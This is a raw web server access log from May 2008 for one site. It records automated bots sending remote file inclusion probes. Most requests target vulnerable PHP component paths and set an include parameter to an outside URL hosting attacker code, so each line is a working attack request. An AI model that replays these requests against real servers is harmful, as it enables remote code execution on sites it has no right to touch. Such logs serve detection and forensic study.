64.38.8.186 - - [28/May/2008:10:28:38 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:28:38 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:28:51 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:28:51 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.30.73.117 - - [28/May/2008:10:28:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:28:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:10:29:18 -0700] "GET /logs/access_080327.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:29:40 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:29:40 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:29:41 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.217.194 - - [28/May/2008:10:29:47 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
66.225.217.194 - - [28/May/2008:10:29:47 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:30:05 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:30:09 -0700] "GET //?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:30:10 -0700] "GET /logs//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 49420 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:30:10 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:30:12 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:30:18 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:30:18 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:30:19 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:30:41 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:30:41 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:30:41 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:30:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:30:41 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
88.208.217.32 - - [28/May/2008:10:30:45 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
88.208.217.32 - - [28/May/2008:10:30:45 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
207.58.181.74 - - [28/May/2008:10:30:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.181.74 - - [28/May/2008:10:30:59 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:31:05 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:31:05 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:31:10 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:31:11 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.74.190 - - [28/May/2008:10:31:18 -0700] "GET /logs/access_080218.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:31:38 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:31:40 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:31:40 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.190.197.169 - - [28/May/2008:10:31:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:31:54 -0700] "GET /logs//customer/home.php//customer/register.php/config.php?xcart_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:32:48 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:32:48 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.229 - - [28/May/2008:10:32:53 -0700] "GET /plans/ HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:32:58 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:33:03 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:33:08 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:33:08 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:33:08 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:10:33:14 -0700] "GET /logs/access_080201.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:33:44 -0700] "GET /logs/access_080308.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.0.18.81 - - [28/May/2008:10:33:52 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
75.0.18.81 - - [28/May/2008:10:33:54 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:10:34:12 -0700] "GET /logs/access_080124.log//modules/My_eGallery/index.php?include_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:34:18 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:34:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:34:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:34:18 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:34:19 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:34:19 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:10:34:33 -0700] "GET /logs/access_080109.log//modules/My_eGallery/index.php?include_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.24.145 - - [28/May/2008:10:34:57 -0700] "GET /logs/lang_nl.php?temppath=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.145 - - [28/May/2008:10:34:57 -0700] "GET /lang_nl.php?temppath=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:35:09 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:10:35:13 -0700] "GET /logs//home.php?content=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:10:35:13 -0700] "GET //home.php?content=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:35:19 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:35:54 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:35:58 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:35:59 -0700] "GET /logs/access_080301.log//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:36:00 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:36:00 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:36:03 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:36:07 -0700] "GET /logs/access_080301.log//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:36:08 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:36:08 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:36:11 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:36:21 -0700] "GET /logs/access_080301.log//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:36:22 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:36:22 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:36:56 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:36:56 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:36:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:10:37:03 -0700] "GET /logs/access_080103.log//?mosConfig_absolute_path=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:37:07 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:10:37:08 -0700] "GET //?mosConfig_absolute_path=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:10:37:08 -0700] "GET /logs//?mosConfig_absolute_path=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 200 49420 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:37:19 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:37:19 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:10:37:28 -0700] "GET /logs/access_080327.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:37:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:37:53 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.229 - - [28/May/2008:10:38:04 -0700] "GET /minamijewelry/source_images/?N=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.60.74.190 - - [28/May/2008:10:38:08 -0700] "GET /logs/access_080218.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:38:32 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:38:33 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:38:33 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:38:38 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:10:38:38 -0700] "GET //add.php?Htmls=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:10:38:38 -0700] "GET /logs//add.php?Htmls=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:38:44 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:38:45 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:38:55 -0700] "GET /logs/access_080215.log//iniwiki/go/Show/TheHome&prev=...admin/spaw/modules/PNphpBB2/modules/PNphpBB2/includes/functions_admin.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:38:55 -0700] "GET //iniwiki/go/Show/TheHome&prev=...admin/spaw/modules/PNphpBB2/modules/PNphpBB2/includes/functions_admin.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:38:55 -0700] "GET /logs//iniwiki/go/Show/TheHome&prev=...admin/spaw/modules/PNphpBB2/modules/PNphpBB2/includes/functions_admin.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [28/May/2008:10:38:55 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
151.11.24.250 - - [28/May/2008:10:38:56 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:39:05 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
